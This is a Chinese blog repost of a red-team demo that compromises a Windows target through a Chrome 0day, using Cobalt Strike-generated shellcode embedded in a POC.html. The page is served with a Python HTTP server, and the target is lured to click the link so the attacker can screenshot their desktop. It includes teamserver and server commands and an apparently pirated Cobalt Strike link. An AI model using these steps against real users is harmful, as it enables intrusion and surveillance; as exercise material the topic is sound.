日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[ 攻防演练演示篇 ] 利用谷歌 0day 漏洞上线靶机

發布時間:2024/1/18 编程问答 68 豆豆
生活随笔 收集整理的這篇文章主要介紹了 [ 攻防演练演示篇 ] 利用谷歌 0day 漏洞上线靶机 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

🍬 博主介紹

👨?🎓 博主介紹:大家好,我是 _PowerShell ,很高興認識大家~
?主攻領域:【滲透領域】【數據通信】 【通訊安全】 【web安全】【面試分析】
🎉點贊?評論?收藏 == 養成習慣(一鍵三連)😋
🎉歡迎關注💗一起學習👍一起討論??一起進步📝文末有彩蛋
🙏作者水平有限,歡迎各位大佬指點,相互學習進步!

文章目錄

  • 🍬 博主介紹
  • 一、前言
  • 二、演示環境搭建
    • 1、靶機安裝低版本谷歌
    • 2、攻擊機安裝CS神器
  • 三、紅方操作
    • 1、POC制作
      • 1.啟動CS服務端
      • 2.打開CS客戶端
      • 3.客戶端連接CS服務端
      • 4.添加監聽器
      • 5.生成payload
      • 6.制作POC
    • 2、準備惡意網頁
  • 四、藍方操作
  • 五、紅方操作
    • 1、藍方人員上線
    • 2、截藍方機器桌面的圖
  • 六、相關資源

一、前言

本次使用于搭建一個演示環境,用于演示,這里我利用了一個Google的0ady
需要注意的是:

1.靶機環境win10、win7均可,sever不行 2.chrome客戶端需64位(Google Chrome < = 89.0.4389.128) 3.瀏覽器需要關閉沙箱模式--no-sandbox 4.攻擊機需要有java和python環境 5.攻擊機我這里利用的Cobaltsrike,當然想使用msf,大灰狼等等工具都是可以的

二、演示環境搭建

1、靶機安裝低版本谷歌

低版本谷歌下載鏈接在文末給出
創建快捷方式到桌面,右鍵編輯快捷方式,在目標后面添加-no-sandbox參數
增加 -no-sandbox 參數的目的是關閉沙箱

2、攻擊機安裝CS神器

Cobaltsrike CS神器下載鏈接:

https://download.csdn.net/download/qq_51577576/87379235

資源有可能會被下架,如果被下架了,自行下載

三、紅方操作

1、POC制作

1.啟動CS服務端

啟動CS,以管理員身份進入teamserver.bat所在目錄
打開運行框,啟動cs

./teamserver.bat 10.10.12.143 123456

2.打開CS客戶端

打開cs客戶端 cobaltsrike

3.客戶端連接CS服務端

輸入ip、端口和密碼等信息

4.添加監聽器

添加監聽器

5.生成payload

生成后門
攻擊–>生成后門–>payload Generator

選擇我們前面創建的監聽器,使用X64payload,點擊Generate

選擇生成路徑,隨便放哪里都行,我就放在了桌面,桌面就會多一個payload.c文件這個就是CS生成的后門文件

6.制作POC

1、打開payload.c文件,并將payload.c中的”\”全部替換為“,0”,如下

2、替換完成之后我們賦值所有的十六進制編碼,并替換到POC.txt的shellcode參數中,如下就是替換完成的
POC.txt下載鏈接再文末給出

3、將txt后綴改為html

2、準備惡意網頁

進入POC.html目錄啟一個python服務,目的是把我們制作的POC.html公開,讓靶機能夠訪問得到
啟動網頁命令

python -m http.server 8080

四、藍方操作

訪問(紅方人員誘導藍方人員點擊)

http://攻擊機IP:8080/POC.html

五、紅方操作

1、藍方人員上線

發現藍方人員成功上線,我們截它桌面的圖

2、截藍方機器桌面的圖

1、使用cs工具操作桌面截圖
右鍵上線機器 --> Explore --> Screenshots

2、成功截取到圖片
執行完上面那一步我們已經截到圖了,我們打開工具欄的圖片圖標,查看截取到的圖片

六、相關資源

1、Cobaltsrike CS神器下載鏈接
2、谷歌0day_POC.txt下載鏈接
3、低版本谷歌下載鏈接
4、Jdk下載鏈接+java安裝配置環境變量下載鏈接
5、Python3.10下載鏈接+python安裝配置環境變量下載鏈接

總結

以上是生活随笔為你收集整理的[ 攻防演练演示篇 ] 利用谷歌 0day 漏洞上线靶机的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。